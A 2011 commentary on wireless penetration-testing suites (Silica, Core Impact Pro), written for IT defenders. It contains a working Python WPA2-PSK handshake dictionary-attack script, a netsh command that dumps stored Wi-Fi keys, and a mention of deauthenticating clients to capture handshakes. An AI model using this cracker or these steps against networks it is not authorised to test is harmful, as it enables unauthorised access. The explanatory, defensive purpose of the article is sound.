Commentary
8/29/2011 02:46 PM
Kurt Marko

Wireless Penetration Testing: Not Just For Hackers

Do Def Con and Black Hat turn you into an IT hypochondriac? Then inoculate your WLAN.

Midsummer in Las Vegas is to geeks, hackers, and IT security pros what mid-April in Augusta is to golf fanatics: an opportunity to watch the best in their respective fields strut their stuff. One could aptly term the twin Vegas conferences, the "official" legitimized Black Hat and no-holds-barred Def Con, the "Masters" of the computer security world. Packed with presentations on innovative exploits, demonstrations of new security software, and competitive hacker challenges, these conferences are invaluable sources of information for security-minded amateurs and professionals alike.

Unfortunately for the rest of IT, they represent an annual horror show demonstrating just how pathetic your security defenses actually are.

You don't even have to be there, either. Just browsing the agenda, reading presentations, and following the stream of news releases is enough to turn anyone into a paranoid, tin-foil-hat-wearing basket case, seeing security doomsday in every email attachment, Web link, or computer glitch. While that's a natural reaction, it's not very productive. Better to use the events as an occasion for annual personal and organizational examination and as motivation to make a new year's worth of security resolutions.

One area where IT can never be too mindful, defensive, and proactive is in wireless security, particularly now that wireless LANs have become the lifeblood of mobile devices and their apps. Enter wireless penetration testing. Pen testing is one of those seamy activities, like undercover police work, that feels dirty but necessary. You imagine yourself as Marshal Dillon, but you're more like Frank Serpico.

In case you haven't noticed, the tools for wireless penetration testing have turned into something of a cottage industry. There are now full-blown suites that do everything from automatically impersonating access points and initiating man-in-the-middle (MITM) attacks to sniffing and decrypting WEP- and WPA-protected traffic. While the development and innovation in wireless hacking -- tools like Kismet, Karmetasploit, and Aircrack-ng -- come from the open source hacker community, finding the right tools and piecing them together into a coherent penetration test regime gets complicated (witness this handy flow chart). Here's where commercial software comes in, exemplified by two interesting new products.

The first, Silica from Immunity, is a veritable Swiss army knife of wireless hacking. Like most of the best security software collections, such as the incomparable BackTrack, Silica runs on Linux; however, it's distributed as a bootable USB drive (for native operation) and as a virtual machine image (i.e., a virtual appliance), making it easy to run on any x86 laptop. What makes Silica interesting and particularly useful (or dangerous, depending on your perspective) is that it combines the features of network and client exploitation tools. Namely, once Silica has compromised a network (by, say, cracking the key) or a wireless client (via MITM), it can unleash a host of client penetration exploits, much like Metasploit. For example, Windows clients store the WEP keys and WPA/WPA2 pre-shared keys of every secured network they have joined in their saved wireless profiles, and a local administrator can read them back in clear text (netsh wlan show profile name=<profile> key=clear does exactly that, which also makes it a quick audit of what your own laptops carry around). If Silica successfully penetrates such a client, it pulls those stored keys, allowing unfettered access to a new set of WLANs.

Of course, Silica also does packet capture and analysis a la Wireshark, so once you hold an encrypted network's key you can view client traffic. One caveat for WPA/WPA2-PSK networks: the key alone only gets you onto the network. To decrypt another client's frames you also need that client's four-way handshake, because the per-session keys are derived from the nonces exchanged in it; testers typically provoke a fresh handshake by briefly deauthenticating the client. (WEP has no such step, and 802.1X/WPA2-Enterprise networks hand each client its own master key, so there is no shared secret to crack in the first place.) In sum, if you want to see both how susceptible your WLANs are to every known attack (Silica comes with an update subscription) and how vulnerable wireless clients are to network exploits, Silica is your tool. Here's a nice video demo illustrating the features and interface, courtesy of Hak5.
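To make concrete what "cracking the key" in the Silica paragraph and the handshake caveat just above actually involve, here is a small added example written for this article; it is not code from Silica, Core Impact, Aircrack-ng, or any other product. It derives the WPA2 PMK from a passphrase and SSID, expands it into the PTK using the MAC addresses and nonces from a four-way handshake, computes the MIC on EAPOL message 2, and runs a dictionary attack against a handshake it constructs itself. The SSID, passphrase, MAC addresses, nonces, and wordlist are all made up for the demo; the only real-world value is the published "password"/"IEEE" PMK test vector checked in the usage note.

```python
"""WPA2-PSK key derivation, four-way-handshake MIC verification and a
dictionary attack on a captured handshake.  Added example for this article;
not code from Silica, Core Impact, Aircrack-ng or any other product.  The
handshake is constructed in-script so the whole thing runs offline."""
import hashlib
import hmac

# Offset of the 16-byte Key MIC field inside an EAPOL-Key frame:
# 4-byte 802.1X header + descriptor type(1) + key info(2) + key len(2)
# + replay counter(8) + nonce(32) + IV(16) + RSC(8) + ID(8) = 81.
MIC_OFFSET = 81


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK -> PMK: PBKDF2-HMAC-SHA1, 4096 rounds, 32 bytes, SSID as salt.
    This is the slow step an attacker repeats once per candidate passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    Everything but the PMK travels in clear during the handshake, which is why a
    capture of messages 1 and 2 is enough to test guesses, and why the PSK alone
    does not decrypt a client whose handshake you never saw."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}  # tk = CCMP temporal key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) carrying SNonce, with the
    MIC computed the way a real client would.  Fields other than SNonce and the
    MIC are placeholders, chosen only so the frame layout is right."""
    body = (b"\x02"                        # descriptor type: RSN
            + b"\x01\x0a"                  # key info: MIC set, pairwise, version 2
            + b"\x00\x10"                  # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")       # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, IV, RSC, ID
            + bytes(16)                    # MIC, zero while computing
            + b"\x00\x00")                 # key data length
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist):
    """Dictionary attack: for each candidate, recompute PMK -> PTK -> MIC and compare
    with the MIC the client sent.  Returns the passphrase that matches, or None."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = msg2[:MIC_OFFSET] + bytes(16) + msg2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac, anonce, snonce)["kck"]
        if eapol_mic(kck, zeroed) == captured_mic:
            return candidate
    return None


def demo(wordlist=None):
    """Build a handshake for a made-up network and attack it.  All values constructed."""
    ssid, passphrase = "CorpGuest", "Summer2011!"          # deliberately weak passphrase
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"demo-anonce").digest()       # fixed stand-ins for random nonces
    snonce = hashlib.sha256(b"demo-snonce").digest()
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    msg2 = build_eapol_msg2(snonce, ptk["kck"])
    if wordlist is None:
        wordlist = ["password", "letmein", "CorpGuest", "Summer2011!", "Winter2011!"]
    return crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Run it as-is and it recovers "Summer2011!" from the five-word list; pmk_from_passphrase("password", "IEEE") reproduces the IEEE 802.11i test vector f42c6fc5...10a12e, which is how you check the PBKDF2 step against a real implementation. The PBKDF2 call is the entire cost of the attack, so a long random passphrase (or 802.1X authentication) is what defeats it, not hiding the SSID, and the tester never needs to touch the AP beyond capturing one client's handshake.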

The second, Core Impact Pro from Core Security, is perhaps the first to specifically address mobile device (Android, BlackBerry, and iOS) vulnerabilities. Like Silica, Core Impact offers a full set of pen-testing features, including Wi-Fi network reconnaissance, encrypted network cracking, MITM client attacks, SSID impersonation (the "evil twin" access point), automated traffic sniffing and packet analysis, and integration with Core's wired and application-testing modules to emulate a multistage assault in which an attacker uses the WLAN as a jumping-off point to get at back-end databases and Web servers. Just added is the ability to target mobile clients with exploits specially crafted for mobile operating systems and usage patterns. For example, Core Impact can send phishing emails and SMS messages, or intercept, redirect, and impersonate Web traffic, in an effort to get users to install a malicious mobile app or divulge personal information. Once a device is compromised, the software can extract phone and SMS logs, GPS location data, and contact information, and even activate the device's camera.

Like any tool, penetration-testing suites can be used with the best (white hat) or worst (black hat) of intentions, and the fact that these things exist at all should be a frightening prospect to anyone charged with network security. But the bottom line is, you can't plug holes you don't know about, and if your org is a high-value target, like any firm handling financial, personal, or sensitive information, you can bet someone is already trying to find cracks in your defenses. Although the latest commercial tools sport point-and-click GUIs, they don't replace a solid understanding of network protocols and client exploitation techniques, meaning they're best left in the hands of a security expert. If you don't have a black-belt security master on staff, find a consultant who knows how to drive these or similar tools to assess the strength of your WLAN defenses.

For all their value as premier sources of information, the summer Vegas hack-a-thons can also serve as a call for renewed security vigilance -- in this case, by seeing your wireless network through the eyes of an attacker.
